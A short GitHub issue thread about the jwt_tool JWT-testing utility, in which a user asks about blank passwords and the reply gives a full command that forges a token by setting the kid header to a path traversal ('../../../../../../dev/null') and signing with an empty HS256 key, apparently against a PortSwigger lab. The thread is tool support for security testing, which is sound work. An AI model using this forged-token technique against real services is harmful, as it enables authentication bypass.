Open re4sonzy opened 2 years ago
Hi,
I add some context for this request based on the token content 😃
Hi, can you make -p accept "" ?
The tool does accept a blank password with -p ""
Or you can use the "blank password" exploit mode with -X b
The same command works for me when substituting the jwt_tool.py binary name:
python3 jwt_tool.py eyJraWQiOiJlYThmNjRjNi1hM2VmLTRiZDctOWRmYi1iNjM0YmRkZjViMmIiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY1NTM4NDY1NX0.MCxsDgrmR5GDgncc7o0hh1eM5jcnzOnl7eKPoCiZ6Yc -I -hc kid -hv "../../../../../../dev/null" -S hs256 -p ""
What does $jwt_tool
map to on your system?